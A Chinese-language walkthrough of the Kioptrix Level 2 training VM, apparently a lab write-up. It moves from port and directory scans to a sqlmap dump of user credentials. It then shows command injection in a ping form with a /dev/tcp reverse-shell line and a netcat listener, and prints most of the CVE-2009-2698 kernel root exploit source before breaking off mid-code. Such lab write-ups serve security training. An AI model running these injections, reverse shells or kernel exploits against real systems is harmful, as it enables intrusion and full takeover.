环境
准备环境
一台kali攻击机
一台Kioptrix_Level_2 靶机
靶机说明
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Kioptrix_Level_2 靶机存在漏洞:
1、SQL注入
2、远程命令执行
3、操作系统内核漏洞
第一步:探测靶机
用netdiscover进行内网主机发现。
Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。
命令如下:
netdiscover -i eth0 -r 192.168.251.0/24
-i:网卡,选择你监控的网卡。比如eth0。
-r:网段,选择你探测的网段。比如192.168.251.0
用nmap进行主机发现
nmap -sn 192.168.251.1-254
-sn:只进行主机发现,不进行端口扫描。
第二步:信息收集
拿到一台目标主机,首先要对其进行信息收集。例如进行端口扫描,以获取主机的端口开放情况和对应的服务信息。
端口扫描
本例中目标主机IP地址为192.168.251.218,攻击主机IP地址为192.168.251.168。
使用nmap进行扫描。命令如下:
nmap -sC -sV -v -p- -A 192.168.251.218
-sC:脚本扫描
-sV:版本扫描
-v:显示详细信息
-p-:指定端口扫描
-A:全面扫描,包含操作系统和服务版本探测等
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:08 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Initiating ARP Ping Scan at 07:08
Scanning 192.168.251.218 [1 port]
Completed ARP Ping Scan at 07:08, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:08
Completed Parallel DNS resolution of 1 host. at 07:08, 0.01s elapsed
Initiating SYN Stealth Scan at 07:08
Scanning bogon (192.168.251.218) [65535 ports]
Discovered open port 3306/tcp on 192.168.251.218
Discovered open port 111/tcp on 192.168.251.218
Discovered open port 80/tcp on 192.168.251.218
Discovered open port 22/tcp on 192.168.251.218
Discovered open port 443/tcp on 192.168.251.218
Discovered open port 1019/tcp on 192.168.251.218
Discovered open port 631/tcp on 192.168.251.218
Completed SYN Stealth Scan at 07:08, 5.52s elapsed (65535 total ports)
Initiating Service scan at 07:08
Scanning 7 services on bogon (192.168.251.218)
Completed Service scan at 07:09, 12.09s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against bogon (192.168.251.218)
NSE: Script scanning 192.168.251.218.
Initiating NSE at 07:09
Completed NSE at 07:09, 1.01s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 1.21s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Nmap scan report for bogon (192.168.251.218)
Host is up (0.00064s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1016/udp status
|_ 100024 1 1019/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_ssl-date: 2024-09-10T07:59:31+00:00; -3h09m35s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de:29f9:fbfb:2eb2:beaf:e624:3157:090f
|_SHA-1: 560c:9196:6506:fb0f:fb81:66b1:ded3:ac11:2ed4:808a
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
|_http-server-header: CUPS/1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
1019/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:40:84:E1 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Uptime guess: 0.015 days (since Tue Sep 10 06:47:05 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: -3h09m35s
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms bogon (192.168.251.218)
NSE: Script Post-scanning.
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
Raw packets sent: 65561 (2.885MB) | Rcvd: 65551 (2.623MB)
通过扫描结果可以发现,该机开放了多个常用端口
| 常用端口 | 对应服务 |
|---|---|
| 22端口 | ssh服务 |
| 80端口 | http服务 |
| 443端口 | SSL服务 |
| 631端口 | CUPS服务(打印) |
| 3306端口 | mysql服务 |
访问http://192.168.251.218/,看一下80端口
有登陆界面,扫下目录看看
目录扫描
1、dirb目录扫描
dirb http://192.168.251.218/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 10 07:29:08 2024
URL_BASE: http://192.168.251.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.251.218/ ----
+ http://192.168.251.218/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.251.218/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.251.218/manual/
+ http://192.168.251.218/usage (CODE:403|SIZE:288)
---- Entering directory: http://192.168.251.218/manual/ ----
==> DIRECTORY: http://192.168.251.218/manual/de/
==> DIRECTORY: http://192.168.251.218/manual/developer/
==> DIRECTORY: http://192.168.251.218/manual/en/
==> DIRECTORY: http://192.168.251.218/manual/faq/
==> DIRECTORY: http://192.168.251.218/manual/fr/
==> DIRECTORY: http://192.168.251.218/manual/howto/
==> DIRECTORY: http://192.168.251.218/manual/images/
+ http://192.168.251.218/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.251.218/manual/ja/
==> DIRECTORY: http://192.168.251.218/manual/ko/
+ http://192.168.251.218/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/misc/
==> DIRECTORY: http://192.168.251.218/manual/mod/
==> DIRECTORY: http://192.168.251.218/manual/programs/
==> DIRECTORY: http://192.168.251.218/manual/ru/
==> DIRECTORY: http://192.168.251.218/manual/ssl/
==> DIRECTORY: http://192.168.251.218/manual/style/
---- Entering directory: http://192.168.251.218/manual/de/ ----
+ http://192.168.251.218/manual/de/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/de/developer/
+ http://192.168.251.218/manual/de/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/de/faq/
+ http://192.168.251.218/manual/de/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/de/howto/
==> DIRECTORY: http://192.168.251.218/manual/de/images/
+ http://192.168.251.218/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.251.218/manual/de/ja (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/de/ko (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/de/misc/
==> DIRECTORY: http://192.168.251.218/manual/de/mod/
==> DIRECTORY: http://192.168.251.218/manual/de/programs/
+ http://192.168.251.218/manual/de/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/de/ssl/
==> DIRECTORY: http://192.168.251.218/manual/de/style/
---- Entering directory: http://192.168.251.218/manual/developer/ ----
+ http://192.168.251.218/manual/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/en/ ----
+ http://192.168.251.218/manual/en/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/en/developer/
+ http://192.168.251.218/manual/en/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/en/faq/
+ http://192.168.251.218/manual/en/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/en/howto/
==> DIRECTORY: http://192.168.251.218/manual/en/images/
+ http://192.168.251.218/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.251.218/manual/en/ja (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/en/ko (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/en/misc/
==> DIRECTORY: http://192.168.251.218/manual/en/mod/
==> DIRECTORY: http://192.168.251.218/manual/en/programs/
+ http://192.168.251.218/manual/en/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/en/ssl/
==> DIRECTORY: http://192.168.251.218/manual/en/style/
---- Entering directory: http://192.168.251.218/manual/faq/ ----
+ http://192.168.251.218/manual/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.251.218/manual/fr/ ----
+ http://192.168.251.218/manual/fr/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/fr/developer/
+ http://192.168.251.218/manual/fr/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/fr/faq/
+ http://192.168.251.218/manual/fr/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/fr/howto/
==> DIRECTORY: http://192.168.251.218/manual/fr/images/
+ http://192.168.251.218/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.251.218/manual/fr/ja (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/fr/ko (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/fr/misc/
==> DIRECTORY: http://192.168.251.218/manual/fr/mod/
==> DIRECTORY: http://192.168.251.218/manual/fr/programs/
+ http://192.168.251.218/manual/fr/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/fr/ssl/
==> DIRECTORY: http://192.168.251.218/manual/fr/style/
---- Entering directory: http://192.168.251.218/manual/howto/ ----
+ http://192.168.251.218/manual/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.251.218/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ja/ ----
+ http://192.168.251.218/manual/ja/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ja/developer/
+ http://192.168.251.218/manual/ja/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ja/faq/
+ http://192.168.251.218/manual/ja/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ja/howto/
==> DIRECTORY: http://192.168.251.218/manual/ja/images/
+ http://192.168.251.218/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.251.218/manual/ja/ja (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/ja/ko (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/ja/misc/
==> DIRECTORY: http://192.168.251.218/manual/ja/mod/
==> DIRECTORY: http://192.168.251.218/manual/ja/programs/
+ http://192.168.251.218/manual/ja/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ja/ssl/
==> DIRECTORY: http://192.168.251.218/manual/ja/style/
---- Entering directory: http://192.168.251.218/manual/ko/ ----
+ http://192.168.251.218/manual/ko/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ko/developer/
+ http://192.168.251.218/manual/ko/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ko/faq/
+ http://192.168.251.218/manual/ko/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ko/howto/
==> DIRECTORY: http://192.168.251.218/manual/ko/images/
+ http://192.168.251.218/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.251.218/manual/ko/ja (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/ko/ko (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/ko/misc/
==> DIRECTORY: http://192.168.251.218/manual/ko/mod/
==> DIRECTORY: http://192.168.251.218/manual/ko/programs/
+ http://192.168.251.218/manual/ko/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ko/ssl/
==> DIRECTORY: http://192.168.251.218/manual/ko/style/
---- Entering directory: http://192.168.251.218/manual/misc/ ----
+ http://192.168.251.218/manual/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/mod/ ----
+ http://192.168.251.218/manual/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.251.218/manual/programs/ ----
+ http://192.168.251.218/manual/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.251.218/manual/ru/ ----
+ http://192.168.251.218/manual/ru/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ru/developer/
+ http://192.168.251.218/manual/ru/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ru/faq/
+ http://192.168.251.218/manual/ru/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ru/howto/
==> DIRECTORY: http://192.168.251.218/manual/ru/images/
+ http://192.168.251.218/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.251.218/manual/ru/ja (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/ru/ko (CODE:301|SIZE:321)
+ http://192.168.251.218/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.251.218/manual/ru/misc/
==> DIRECTORY: http://192.168.251.218/manual/ru/mod/
==> DIRECTORY: http://192.168.251.218/manual/ru/programs/
+ http://192.168.251.218/manual/ru/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.251.218/manual/ru/ssl/
==> DIRECTORY: http://192.168.251.218/manual/ru/style/
---- Entering directory: http://192.168.251.218/manual/ssl/ ----
+ http://192.168.251.218/manual/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.251.218/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/de/developer/ ----
+ http://192.168.251.218/manual/de/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/de/faq/ ----
+ http://192.168.251.218/manual/de/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.251.218/manual/de/howto/ ----
+ http://192.168.251.218/manual/de/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.251.218/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/de/misc/ ----
+ http://192.168.251.218/manual/de/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/de/mod/ ----
+ http://192.168.251.218/manual/de/mod/index.html (CODE:200|SIZE:13561)
---- Entering directory: http://192.168.251.218/manual/de/programs/ ----
+ http://192.168.251.218/manual/de/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.251.218/manual/de/ssl/ ----
+ http://192.168.251.218/manual/de/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.251.218/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/en/developer/ ----
+ http://192.168.251.218/manual/en/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/en/faq/ ----
+ http://192.168.251.218/manual/en/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.251.218/manual/en/howto/ ----
+ http://192.168.251.218/manual/en/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.251.218/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/en/misc/ ----
+ http://192.168.251.218/manual/en/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/en/mod/ ----
+ http://192.168.251.218/manual/en/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.251.218/manual/en/programs/ ----
+ http://192.168.251.218/manual/en/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.251.218/manual/en/ssl/ ----
+ http://192.168.251.218/manual/en/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.251.218/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/fr/developer/ ----
+ http://192.168.251.218/manual/fr/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/fr/faq/ ----
+ http://192.168.251.218/manual/fr/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.251.218/manual/fr/howto/ ----
+ http://192.168.251.218/manual/fr/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.251.218/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/fr/misc/ ----
+ http://192.168.251.218/manual/fr/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/fr/mod/ ----
+ http://192.168.251.218/manual/fr/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.251.218/manual/fr/programs/ ----
+ http://192.168.251.218/manual/fr/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.251.218/manual/fr/ssl/ ----
+ http://192.168.251.218/manual/fr/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.251.218/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ja/developer/ ----
+ http://192.168.251.218/manual/ja/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/ja/faq/ ----
+ http://192.168.251.218/manual/ja/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.251.218/manual/ja/howto/ ----
+ http://192.168.251.218/manual/ja/howto/index.html (CODE:200|SIZE:5607)
---- Entering directory: http://192.168.251.218/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ja/misc/ ----
+ http://192.168.251.218/manual/ja/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/ja/mod/ ----
+ http://192.168.251.218/manual/ja/mod/index.html (CODE:200|SIZE:13298)
---- Entering directory: http://192.168.251.218/manual/ja/programs/ ----
+ http://192.168.251.218/manual/ja/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.251.218/manual/ja/ssl/ ----
+ http://192.168.251.218/manual/ja/ssl/index.html (CODE:200|SIZE:3957)
---- Entering directory: http://192.168.251.218/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ko/developer/ ----
+ http://192.168.251.218/manual/ko/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/ko/faq/ ----
+ http://192.168.251.218/manual/ko/faq/index.html (CODE:200|SIZE:3371)
---- Entering directory: http://192.168.251.218/manual/ko/howto/ ----
+ http://192.168.251.218/manual/ko/howto/index.html (CODE:200|SIZE:5299)
---- Entering directory: http://192.168.251.218/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ko/misc/ ----
+ http://192.168.251.218/manual/ko/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/ko/mod/ ----
+ http://192.168.251.218/manual/ko/mod/index.html (CODE:200|SIZE:12795)
---- Entering directory: http://192.168.251.218/manual/ko/programs/ ----
+ http://192.168.251.218/manual/ko/programs/index.html (CODE:200|SIZE:4543)
---- Entering directory: http://192.168.251.218/manual/ko/ssl/ ----
+ http://192.168.251.218/manual/ko/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.251.218/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ru/developer/ ----
+ http://192.168.251.218/manual/ru/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.251.218/manual/ru/faq/ ----
+ http://192.168.251.218/manual/ru/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.251.218/manual/ru/howto/ ----
+ http://192.168.251.218/manual/ru/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.251.218/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.251.218/manual/ru/misc/ ----
+ http://192.168.251.218/manual/ru/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.251.218/manual/ru/mod/ ----
+ http://192.168.251.218/manual/ru/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.251.218/manual/ru/programs/ ----
+ http://192.168.251.218/manual/ru/programs/index.html (CODE:200|SIZE:5016)
---- Entering directory: http://192.168.251.218/manual/ru/ssl/ ----
+ http://192.168.251.218/manual/ru/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.251.218/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Sep 10 07:38:08 2024
DOWNLOADED: 262884 - FOUND: 102
2、dirsearch目录扫描
dirsearch -u 192.168.251.218 -e * -x 400-499
-u:指定URL
-e:选择扩展名,*代表全部选择
-x:排除某些状态码,逗号隔开,支持范围隔开(400-499);与之对应的是-i
更多使用帮助在github中查看dirsearch项目
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: Desktop | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /root/reports/_192.168.251.218/_24-09-10_07-52-55.txt
Target: https://192.168.251.218/
[07:52:55] Starting:
[07:53:37] 200 - 7KB - /manual/index.html
[07:53:37] 301 - 321B - /manual -> https://192.168.251.218/manual/
Task Completed
扫描下来仅有http://192.168.251.218/manual/,访问看看
Apache版本文档,略过
漏洞线索1:SQL注入
先用brup suite抓个登录界面的流量包
将这个流量包保存到本地然后启动sqlmap
sqlmap -r 流量包名称 --level 4 --risk 3
一阵按y之后,跑出来结果。
查找到两个注入点,随便选一个注入。往下查数据库名称
sqlmap -r sqlmap --level 4 --risk 3 -p psw -dbs
查找到数据库名称,继续往下查数据库的表。
sqlmap -r sqlmap --level 4 --risk 3 -p psw -D webapp -tables
查找到数据库的表,继续往下查表中的列
sqlmap -r sqlmap --level 4 --risk 3 -p psw -D webapp -T users -columns
查找到列,将需要的数据导出。
sqlmap -r sqlmap --level 4 --risk 3 -p psw -D webapp -T users -C "username,password" -dump
最后成功获得两个用户的有效登录凭证。
| 用户 | 密码 |
|---|---|
| admin | 5afac8d85f |
| john | 66lajGGbla |
从用户名看,admin用户可能拥有更高权限,所以首先使用admin账户登录。
漏洞线索2:远程命令执行
登录成功后,网站跳转到一个新页面。
功能是用户在文本框中输入一个IP地址并提交后,网站将对IP地址执行ping命令。
先测试功能是否可以正常运行
命令正常执行,并获得“ping 192.168.251.168”命令的执行结果
那么我们猜测,在这里我们是否可以在后面跟我们想要执行的命令。
192.168.251.168;whoami
命令成功执行,我们获取到了当前执行命令的用户名
也成功获取到了当前的目录所在位置
这预示着我们获得了一个远程命令执行漏洞。
接下来我们尝试进行反弹shell的命令。
先在本地终端执行下面命令,监听端口。
nc -lvnp 8888
在文本框执行下面命令
192.168.251.168;bash -i >& /dev/tcp/192.168.251.168/8888 0>&1
成功获得反弹shell连接。
漏洞线索3:操作系统内核漏洞
当前还处在Apache用户,还未获得最高权限,接下来将对它进行提权。
可以访问系统文件。
uname -a
cat /etc/*-release
查看系统信息和发行版本
uname -a: 此命令可以查看当前Linux系统内核具体版本、使用的发行版版本、以及当前处理器架构。
cat /etc/*-release: 详细的发行版系统版本信息(不同的发行版可能名字会略有不同,并且此文件可能有多个,这种情况下我们可以使用通配符 * 来解决这个问题。
cat /etc/issue: 连接系统时显示的提示信息,默认一般会存放发行版名称等信息。
获取到系统信息Linux 2.6 centos 4.5,查看漏洞库有没有exp
searchsploit linux 2.6 centos 4.5
也可以访问漏洞库。
上一篇从漏洞库下载,这一次从searchsploit下载
searchsploit -m 9542.c
9542.c脚本,从题目上可以看出比9479针对性更强,在使用中尽可能选择针对性强的以避免额外的风险。
文件下载成功
cat 9542.c
查看下脚本内容
脚本中已经给出使用方法。
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>
unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
unsigned *addr=task;
while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
addr++;
}
addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
return;
}
void exploit();
void kernel_code()
{
asm("exploit:\n"
"push %eax\n"
"movl $0xfffff000,%eax\n"
"andl %esp,%eax\n"
"pushl (%eax)\n"
"call get_root_uid\n"
"addl $4,%esp\n"
"popl %eax\n");
return;
}
void *kernel=kernel_code;
int main(int argc, char **argv)
{
int fd=0;
char buf[1024];
struct sockaddr x0x;
void *zero_page;
uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(unsigned long *)0x0=0x90909090;
*(char *)0x00000004=0x90; /* +1 */
*(char *)0x00000005=0xff;
*(char *)0x00000006=0x25;
*(unsigned long *)0x00000007=(unsigned long)&kernel;
*(char *)0x0000000b=0xc3;
